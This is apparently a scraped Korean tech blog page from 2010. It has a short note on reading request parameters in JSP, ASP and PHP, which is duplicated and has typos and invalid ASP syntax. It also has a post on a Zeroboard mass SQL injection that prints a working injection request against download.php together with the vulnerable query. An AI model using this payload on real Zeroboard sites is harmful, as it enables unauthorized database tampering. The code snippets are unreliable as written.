ZuneDesktopTheme.msi'tips' 카테고리의 다른 글
| IIS 파일업로드 용량제한 (0) | 2010.03.30 |
|---|---|
| vmware 리눅스 하드 추가 (0) | 2010.03.29 |
| WebAPP별 파라미터 전송방식 (0) | 2010.02.01 |
| 윈도우 확장자 한꺼번에 바꾸기 (0) | 2010.01.25 |
| 파일업로드 예제 (0) | 2010.01.05 |
WebAPP별 파라미터 전송방식
tips 2010. 2. 1. 20:01 |JSP
<%
String name = request.getParameter("name"); // String
int age = Integer.parseInt(request.getParamter("age")); //integer
%>
ASP
<%
dim name = request.form("name");
dim name = request.QueryString("name"); // get방식만
%>
PHP
<?
$param = $_POST['param'];
$param = $_GET['param'];
?>
<%
String name = request.getParameter("name"); // String
int age = Integer.parseInt(request.getParamter("age")); //integer
%>
ASP
<%
dim name = request.form("name");
dim name = request.QueryString("name"); // get방식만
%>
PHP
<?
$param = $_POST['param'];
$param = $_GET['param'];
?>
'tips' 카테고리의 다른 글
| vmware 리눅스 하드 추가 (0) | 2010.03.29 |
|---|---|
| xp zune테마 (0) | 2010.02.19 |
| 윈도우 확장자 한꺼번에 바꾸기 (0) | 2010.01.25 |
| 파일업로드 예제 (0) | 2010.01.05 |
| OS Command Injection 환경예제 (0) | 2010.01.04 |
Zeroboard에서 발생한 Mass Sql Injection
vulnerability 2010. 1. 26. 18:01 |참고: http://www.securityplus.or.kr/xe/?document_srl=17273&vid=bangrip1
취약쿼리실행
update zetyx_board_id set downloadXXX=downloadXXX+1 where no='6'
공격문
download.php?id=id&filenum=1=download1,memo= concat(char(67),char(79),char(68),char(69))%23&no=6
1=download1 의 경우 임의의 문자삽입 가능
예)
2=111
취약쿼리실행
update zetyx_board_id set downloadXXX=downloadXXX+1 where no='6'
공격문
download.php?id=id&filenum=1=download1,memo= concat(char(67),char(79),char(68),char(69))%23&no=6
1=download1 의 경우 임의의 문자삽입 가능
예)
2=111
'vulnerability' 카테고리의 다른 글
| LNK 파일 생성기(Windows LNK Vulnerability) (1) | 2010.07.27 |
|---|---|
| html file upload form (0) | 2010.06.24 |
| Java Deployment Toolkit Test Page (0) | 2010.04.19 |
| XE 1.4.0.10 XSS/CSRF 취약점 (0) | 2010.04.16 |
| FCK Editor (0) | 2010.04.11 |